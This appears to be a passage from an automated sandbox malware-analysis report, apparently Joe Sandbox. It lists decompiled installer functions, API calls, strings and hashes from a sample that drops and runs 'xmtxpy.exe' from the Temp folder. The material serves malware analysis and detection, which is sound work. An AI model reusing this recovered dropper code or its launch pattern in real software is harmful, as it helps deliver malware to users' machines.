                          • GetDiskFreeSpaceA.KERNEL32(0041F460,?,?,0000040F,?,0041F460,0041F460,?,00000000,0041F460,?,?,000003FB,?), ref: 004044B5
                          • MulDiv.KERNEL32 ref: 004044D0
                          • SetDlgItemTextA.USER32(00000000,00000400,0041F450), ref: 00404549
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                          • String ID: A$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd
                          • API String ID: 2246997448-3263883584
                          • Opcode ID: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
                          • Instruction ID: 6850db0b715ddbe2af210025c5f30c7158fed24285b7178da21f46715b177744
                          • Opcode Fuzzy Hash: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
                          • Instruction Fuzzy Hash: BA9162B1A00218BBDF11AFA1DD85AAF77B8EF84314F10403BFB04B6291D77C9A419B59
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 74%
                          			E00405AA7(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                          				signed int _v8;
                          				struct _ITEMIDLIST* _v12;
                          				signed int _v16;
                          				signed char _v20;
                          				signed char _v24;
                          				signed int _v28;
                          				signed int _t36;
                          				CHAR* _t37;
                          				signed char _t39;
                          				signed int _t40;
                          				int _t41;
                          				char _t51;
                          				char _t52;
                          				char _t54;
                          				char _t56;
                          				void* _t64;
                          				signed int _t68;
                          				intOrPtr _t72;
                          				signed int _t73;
                          				signed char _t74;
                          				intOrPtr _t77;
                          				char _t81;
                          				void* _t83;
                          				CHAR* _t84;
                          				void* _t86;
                          				signed int _t93;
                          				signed int _t95;
                          				void* _t96;
                          
                          				_t86 = __esi;
                          				_t83 = __edi;
                          				_t64 = __ebx;
                          				_t36 = _a8;
                          				if(_t36 < 0) {
                          					_t77 =  *0x42367c; // 0x8c223a
                          					_t36 =  *(_t77 - 4 + _t36 * 4);
                          				}
                          				_t72 =  *0x423ed8; // 0x8c1cb8
                          				_t73 = _t72 + _t36;
                          				_t37 = 0x422e40;
                          				_push(_t64);
                          				_push(_t86);
                          				_push(_t83);
                          				_t84 = 0x422e40;
                          				if(_a4 - 0x422e40 < 0x800) {
                          					_t84 = _a4;
                          					_a4 = _a4 & 0x00000000;
                          				}
                          				while(1) {
                          					_t81 =  *_t73;
                          					if(_t81 == 0) {
                          						break;
                          					}
                          					__eflags = _t84 - _t37 - 0x400;
                          					if(_t84 - _t37 >= 0x400) {
                          						break;
                          					}
                          					_t73 = _t73 + 1;
                          					__eflags = _t81 - 0xfc;
                          					_a8 = _t73;
                          					if(__eflags <= 0) {
                          						if(__eflags != 0) {
                          							 *_t84 = _t81;
                          							_t84 =  &(_t84[1]);
                          							__eflags = _t84;
                          						} else {
                          							 *_t84 =  *_t73;
                          							_t84 =  &(_t84[1]);
                          							_t73 = _t73 + 1;
                          						}
                          						continue;
                          					}
                          					_t39 =  *(_t73 + 1);
                          					_t74 =  *_t73;
                          					_a8 = _a8 + 2;
                          					_v20 = _t39;
                          					_t93 = (_t39 & 0x0000007f) << 0x00000007 | _t74 & 0x0000007f;
                          					_t68 = _t74;
                          					_t40 = _t39 | 0x00000080;
                          					__eflags = _t81 - 0xfe;
                          					_v28 = _t68;
                          					_v24 = _t74 | 0x00000080;
                          					_v16 = _t40;
                          					if(_t81 != 0xfe) {
                          						__eflags = _t81 - 0xfd;
                          						if(_t81 != 0xfd) {
                          							__eflags = _t81 - 0xff;
                          							if(_t81 == 0xff) {
                          								__eflags = (_t40 | 0xffffffff) - _t93;
                          								E00405AA7(_t68, _t84, _t93, _t84, (_t40 | 0xffffffff) - _t93);
                          							}
                          							L41:
                          							_t41 = lstrlenA(_t84);
                          							_t73 = _a8;
                          							_t84 =  &(_t84[_t41]);
                          							_t37 = 0x422e40;
                          							continue;
                          						}
                          						__eflags = _t93 - 0x1d;
                          						if(_t93 != 0x1d) {
                          							__eflags = (_t93 << 0xa) + 0x424000;
                          							E00405A85(_t84, (_t93 << 0xa) + 0x424000);
                          						} else {
                          							E004059E3(_t84,  *0x423ea8);
                          						}
                          						__eflags = _t93 + 0xffffffeb - 7;
                          						if(_t93 + 0xffffffeb < 7) {
                          							L32:
                          							E00405CE3(_t84);
                          						}
                          						goto L41;
                          					}
                          					_t95 = 2;
                          					_t51 = GetVersion();
                          					__eflags = _t51;
                          					if(_t51 >= 0) {
                          						L12:
                          						_v8 = 1;
                          						L13:
                          						__eflags =  *0x423f24;
                          						if( *0x423f24 != 0) {
                          							_t95 = 4;
                          						}
                          						__eflags = _t68;
                          						if(_t68 >= 0) {
                          							__eflags = _t68 - 0x25;
                          							if(_t68 != 0x25) {
                          								__eflags = _t68 - 0x24;
                          								if(_t68 == 0x24) {
                          									GetWindowsDirectoryA(_t84, 0x400);
                          									_t95 = 0;
                          								}
                          								while(1) {
                          									__eflags = _t95;
                          									if(_t95 == 0) {
                          										goto L29;
                          									}
                          									_t52 =  *0x423ea4; // 0x74631528
                          									_t95 = _t95 - 1;
                          									__eflags = _t52;
                          									if(_t52 == 0) {
                          										L25:
                          										_t54 = SHGetSpecialFolderLocation( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18),  &_v12);
                          										__eflags = _t54;
                          										if(_t54 != 0) {
                          											L27:
                          											 *_t84 =  *_t84 & 0x00000000;
                          											__eflags =  *_t84;
                          											continue;
                          										}
                          										__imp__SHGetPathFromIDListA(_v12, _t84);
                          										__imp__CoTaskMemFree(_v12);
                          										__eflags = _t54;
                          										if(_t54 != 0) {
                          											goto L29;
                          										}
                          										goto L27;
                          									}
                          									__eflags = _v8;
                          									if(_v8 == 0) {
                          										goto L25;
                          									}
                          									_t56 =  *_t52( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18), 0, 0, _t84);
                          									__eflags = _t56;
                          									if(_t56 == 0) {
                          										goto L29;
                          									}
                          									goto L25;
                          								}
                          								goto L29;
                          							}
                          							GetSystemDirectoryA(_t84, 0x400);
                          							goto L29;
                          						} else {
                          							_t71 = (_t68 & 0x0000003f) +  *0x423ed8;
                          							E0040596C(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t68 & 0x0000003f) +  *0x423ed8, _t84, _t68 & 0x00000040);
                          							__eflags =  *_t84;
                          							if( *_t84 != 0) {
                          								L30:
                          								__eflags = _v20 - 0x1a;
                          								if(_v20 == 0x1a) {
                          									lstrcatA(_t84, "\\Microsoft\\Internet Explorer\\Quick Launch");
                          								}
                          								goto L32;
                          							}
                          							E00405AA7(_t71, _t84, _t95, _t84, _v20);
                          							L29:
                          							__eflags =  *_t84;
                          							if( *_t84 == 0) {
                          								goto L32;
                          							}
                          							goto L30;
                          						}
                          					}
                          					__eflags = _t51 - 0x5a04;
                          					if(_t51 == 0x5a04) {
                          						goto L12;
                          					}
                          					__eflags = _v20 - 0x23;
                          					if(_v20 == 0x23) {
                          						goto L12;
                          					}
                          					__eflags = _v20 - 0x2e;
                          					if(_v20 == 0x2e) {
                          						goto L12;
                          					} else {
                          						_v8 = _v8 & 0x00000000;
                          						goto L13;
                          					}
                          				}
                          				 *_t84 =  *_t84 & 0x00000000;
                          				if(_a4 == 0) {
                          					return _t37;
                          				}
                          				return E00405A85(_a4, _t37);
                          			}
































                          APIs
                          • GetVersion.KERNEL32(00000000,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405B4B
                          • GetSystemDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd,00000400), ref: 00405BC6
                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd,00000400), ref: 00405BD9
                          • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405C15
                          • SHGetPathFromIDListA.SHELL32(00000000,C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd), ref: 00405C23
                          • CoTaskMemFree.OLE32(00000000), ref: 00405C2E
                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd,\Microsoft\Internet Explorer\Quick Launch), ref: 00405C50
                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd,00000000,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405CA2
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                          • String ID: C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                          • API String ID: 900638850-648608478
                          • Opcode ID: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
                          • Instruction ID: 02e69832ec688910c0edf1e4f77165a8fa6b6d990b95ba5e8d1c2d1c59892890
                          • Opcode Fuzzy Hash: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
                          • Instruction Fuzzy Hash: B251E371A08B19ABEB215B64CC84BBF3B74EB15714F14023BE911BA2D0D37C5982DE4E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 74%
                          			E00402012() {
                          				void* _t44;
                          				intOrPtr* _t48;
                          				intOrPtr* _t50;
                          				intOrPtr* _t52;
                          				intOrPtr* _t54;
                          				signed int _t58;
                          				intOrPtr* _t59;
                          				intOrPtr* _t62;
                          				intOrPtr* _t64;
                          				intOrPtr* _t66;
                          				intOrPtr* _t69;
                          				intOrPtr* _t71;
                          				int _t75;
                          				signed int _t81;
                          				intOrPtr* _t88;
                          				void* _t95;
                          				void* _t96;
                          				void* _t100;
                          
                          				 *(_t100 - 0x30) = E004029E8(0xfffffff0);
                          				_t96 = E004029E8(0xffffffdf);
                          				 *((intOrPtr*)(_t100 - 0x2c)) = E004029E8(2);
                          				 *((intOrPtr*)(_t100 - 8)) = E004029E8(0xffffffcd);
                          				 *((intOrPtr*)(_t100 - 0x44)) = E004029E8(0x45);
                          				if(E004055E5(_t96) == 0) {
                          					E004029E8(0x21);
                          				}
                          				_t44 = _t100 + 8;
                          				__imp__CoCreateInstance(0x407384, _t75, 1, 0x407374, _t44);
                          				if(_t44 < _t75) {
                          					L13:
                          					 *((intOrPtr*)(_t100 - 4)) = 1;
                          					_push(0xfffffff0);
                          				} else {
                          					_t48 =  *((intOrPtr*)(_t100 + 8));
                          					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407394, _t100 - 0x34);
                          					if(_t95 >= _t75) {
                          						_t52 =  *((intOrPtr*)(_t100 + 8));
                          						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
                          						_t54 =  *((intOrPtr*)(_t100 + 8));
                          						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\Albus\\AppData\\Local\\Temp");
                          						_t81 =  *(_t100 - 0x14);
                          						_t58 = _t81 >> 0x00000008 & 0x000000ff;
                          						if(_t58 != 0) {
                          							_t88 =  *((intOrPtr*)(_t100 + 8));
                          							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
                          							_t81 =  *(_t100 - 0x14);
                          						}
                          						_t59 =  *((intOrPtr*)(_t100 + 8));
                          						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
                          						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
                          							_t71 =  *((intOrPtr*)(_t100 + 8));
                          							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
                          						}
                          						_t62 =  *((intOrPtr*)(_t100 + 8));
                          						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
                          						_t64 =  *((intOrPtr*)(_t100 + 8));
                          						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
                          						if(_t95 >= _t75) {
                          							_t95 = 0x80004005;
                          							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409360, 0x400) != 0) {
                          								_t69 =  *((intOrPtr*)(_t100 - 0x34));
                          								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409360, 1);
                          							}
                          						}
                          						_t66 =  *((intOrPtr*)(_t100 - 0x34));
                          						 *((intOrPtr*)( *_t66 + 8))(_t66);
                          					}
                          					_t50 =  *((intOrPtr*)(_t100 + 8));
                          					 *((intOrPtr*)( *_t50 + 8))(_t50);
                          					if(_t95 >= _t75) {
                          						_push(0xfffffff4);
                          					} else {
                          						goto L13;
                          					}
                          				}
                          				E00401423();
                          				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t100 - 4));
                          				return 0;
                          			}






















                          APIs
                          • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?), ref: 00402065
                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409360,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040211F
                          Strings
                          • C:\Users\user\AppData\Local\Temp, xrefs: 0040209D
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWide
                          • String ID: C:\Users\user\AppData\Local\Temp
                          • API String ID: 123533781-2935972921
                          • Opcode ID: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
                          • Instruction ID: 9a85de16ea5d7a81ede148d9b78cdb1ba9a910f30d2aff7a9c0f788a9809de35
                          • Opcode Fuzzy Hash: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
                          • Instruction Fuzzy Hash: 0E414DB5A00104AFDB00DFA4CD89E9E7BBABF49314B20416AF905EB2D1DA79DD41CB64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 39%
                          			E00402630(char __ebx, char* __edi, char* __esi) {
                          				void* _t19;
                          
                          				if(FindFirstFileA(E004029E8(2), _t19 - 0x1a4) != 0xffffffff) {
                          					E004059E3(__edi, _t6);
                          					_push(_t19 - 0x178);
                          					_push(__esi);
                          					E00405A85();
                          				} else {
                          					 *__edi = __ebx;
                          					 *__esi = __ebx;
                          					 *((intOrPtr*)(_t19 - 4)) = 1;
                          				}
                          				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t19 - 4));
                          				return 0;
                          			}





                          APIs
                          • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040263F
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: FileFindFirst
                          • String ID:
                          • API String ID: 1974802433-0
                          • Opcode ID: e252be4d8dac41554fd361ab132364df58656f291f34e3e62bfafec942fe1f51
                          • Instruction ID: 76eef0906e3fa6c86cf2ebea0eb1ad5f879b60bc34498b8afccad509cb3c3919
                          • Opcode Fuzzy Hash: e252be4d8dac41554fd361ab132364df58656f291f34e3e62bfafec942fe1f51
                          • Instruction Fuzzy Hash: 67F0A772A04100EED700EBB59D49EFE7778DF11324F6005BBE111B20C1C7B889419A2A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 93%
                          			E00403F7F(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                          				char _v8;
                          				signed int _v12;
                          				void* _v16;
                          				struct HWND__* _t52;
                          				intOrPtr _t71;
                          				intOrPtr _t85;
                          				long _t86;
                          				int _t98;
                          				struct HWND__* _t99;
                          				signed int _t100;
                          				intOrPtr _t103;
                          				intOrPtr _t107;
                          				intOrPtr _t109;
                          				int _t110;
                          				signed int* _t112;
                          				signed int _t113;
                          				char* _t114;
                          				CHAR* _t115;
                          
                          				if(_a8 != 0x110) {
                          					if(_a8 != 0x111) {
                          						L11:
                          						if(_a8 != 0x4e) {
                          							if(_a8 == 0x40b) {
                          								 *0x420478 =  *0x420478 + 1;
                          							}
                          							L25:
                          							_t110 = _a16;
                          							L26:
                          							return E00403E9E(_a8, _a12, _t110);
                          						}
                          						_t52 = GetDlgItem(_a4, 0x3e8);
                          						_t110 = _a16;
                          						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                          							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                          							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                          							_v12 = _t100;
                          							_v16 = _t109;
                          							_v8 = 0x422e40;
                          							if(_t100 - _t109 < 0x800) {
                          								SendMessageA(_t52, 0x44b, 0,  &_v16);
                          								SetCursor(LoadCursorA(0, 0x7f02));
                          								_t40 =  &_v8; // 0x422e40
                          								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
                          								SetCursor(LoadCursorA(0, 0x7f00));
                          								_t110 = _a16;
                          							}
                          						}
                          						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                          							goto L26;
                          						} else {
                          							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                          								SendMessageA( *0x423ea8, 0x111, 1, 0);
                          							}
                          							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                          								SendMessageA( *0x423ea8, 0x10, 0, 0);
                          							}
                          							return 1;
                          						}
                          					}
                          					if(_a12 >> 0x10 != 0 ||  *0x420478 != 0) {
                          						goto L25;
                          					} else {
                          						_t103 =  *0x41fc68; // 0x0
                          						_t25 = _t103 + 0x14; // 0x14
                          						_t112 = _t25;
                          						if(( *_t112 & 0x00000020) == 0) {
                          							goto L25;
                          						}
                          						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                          						E00403E59(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                          						E0040420A();
                          						goto L11;
                          					}
                          				}
                          				_t98 = _a16;
                          				_t113 =  *(_t98 + 0x30);
                          				if(_t113 < 0) {
                          					_t107 =  *0x42367c; // 0x8c223a
                          					_t113 =  *(_t107 - 4 + _t113 * 4);
                          				}
                          				_t71 =  *0x423ed8; // 0x8c1cb8
                          				_push( *((intOrPtr*)(_t98 + 0x34)));
                          				_t114 = _t113 + _t71;
                          				_push(0x22);
                          				_a16 =  *_t114;
                          				_v12 = _v12 & 0x00000000;
                          				_t115 = _t114 + 1;
                          				_v16 = _t115;
                          				_v8 = E00403F4B;
                          				E00403E37(_a4);
                          				_push( *((intOrPtr*)(_t98 + 0x38)));
                          				_push(0x23);
                          				E00403E37(_a4);
                          				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                          				E00403E59( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                          				_t99 = GetDlgItem(_a4, 0x3e8);
                          				E00403E6C(_t99);
                          				SendMessageA(_t99, 0x45b, 1, 0);
                          				_t85 =  *0x423eb0; // 0x8c0fa0
                          				_t86 =  *(_t85 + 0x68);
                          				if(_t86 < 0) {
                          					_t86 = GetSysColor( ~_t86);
                          				}
                          				SendMessageA(_t99, 0x443, 0, _t86);
                          				SendMessageA(_t99, 0x445, 0, 0x4010000);
                          				 *0x41f45c =  *0x41f45c & 0x00000000;
                          				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                          				SendMessageA(_t99, 0x449, _a16,  &_v16);
                          				 *0x420478 =  *0x420478 & 0x00000000;
                          				return 0;
                          			}






















                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                          • String ID: @.B$N$open
                          • API String ID: 3615053054-3815657624
                          • Opcode ID: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
                          • Instruction ID: c3de460066171d4a99b3db8707b5a70307f179c1ca483427b8a670d92431fbf8
                          • Opcode Fuzzy Hash: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
                          • Instruction Fuzzy Hash: 4E61C3B1A40209BFEB109F60CC45B6A7B69FB54715F108136FB04BA2D1C7B8A951CFA8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 90%
                          			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                          				struct tagLOGBRUSH _v16;
                          				struct tagRECT _v32;
                          				struct tagPAINTSTRUCT _v96;
                          				struct HDC__* _t70;
                          				struct HBRUSH__* _t87;
                          				struct HFONT__* _t94;
                          				long _t102;
                          				intOrPtr _t115;
                          				signed int _t126;
                          				struct HDC__* _t128;
                          				intOrPtr _t130;
                          
                          				if(_a8 == 0xf) {
                          					_t130 =  *0x423eb0; // 0x8c0fa0
                          					_t70 = BeginPaint(_a4,  &_v96);
                          					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                          					_a8 = _t70;
                          					GetClientRect(_a4,  &_v32);
                          					_t126 = _v32.bottom;
                          					_v32.bottom = _v32.bottom & 0x00000000;
                          					while(_v32.top < _t126) {
                          						_a12 = _t126 - _v32.top;
                          						asm("cdq");
                          						asm("cdq");
                          						asm("cdq");
                          						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                          						_t87 = CreateBrushIndirect( &_v16);
                          						_v32.bottom = _v32.bottom + 4;
                          						_a16 = _t87;
                          						FillRect(_a8,  &_v32, _t87);
                          						DeleteObject(_a16);
                          						_v32.top = _v32.top + 4;
                          					}
                          					if( *(_t130 + 0x58) != 0xffffffff) {
                          						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                          						_a16 = _t94;
                          						if(_t94 != 0) {
                          							_t128 = _a8;
                          							_v32.left = 0x10;
                          							_v32.top = 8;
                          							SetBkMode(_t128, 1);
                          							SetTextColor(_t128,  *(_t130 + 0x58));
                          							_a8 = SelectObject(_t128, _a16);
                          							DrawTextA(_t128, "fwwmjbqpxzax Setup", 0xffffffff,  &_v32, 0x820);
                          							SelectObject(_t128, _a8);
                          							DeleteObject(_a16);
                          						}
                          					}
                          					EndPaint(_a4,  &_v96);
                          					return 0;
                          				}
                          				_t102 = _a16;
                          				if(_a8 == 0x46) {
                          					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                          					_t115 =  *0x423ea8; // 0x0
                          					 *((intOrPtr*)(_t102 + 4)) = _t115;
                          				}
                          				return DefWindowProcA(_a4, _a8, _a12, _t102);
                          			}

                          APIs
                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                          • BeginPaint.USER32(?,?), ref: 00401047
                          • GetClientRect.USER32 ref: 0040105B
                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                          • DeleteObject.GDI32(?), ref: 004010ED
                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                          • SetTextColor.GDI32(00000000,?), ref: 00401130
                          • SelectObject.GDI32(00000000,?), ref: 00401140
                          • DrawTextA.USER32(00000000,fwwmjbqpxzax Setup,000000FF,00000010,00000820), ref: 00401156
                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                          • DeleteObject.GDI32(?), ref: 00401165
                          • EndPaint.USER32(?,?), ref: 0040116E
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                          • String ID: F$fwwmjbqpxzax Setup
                          • API String ID: 941294808-1473510216
                          • Opcode ID: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                          • Instruction ID: 81477e3a2fde3fb3f26aa953fc06e347994717d76cab2c79682594c458f31f57
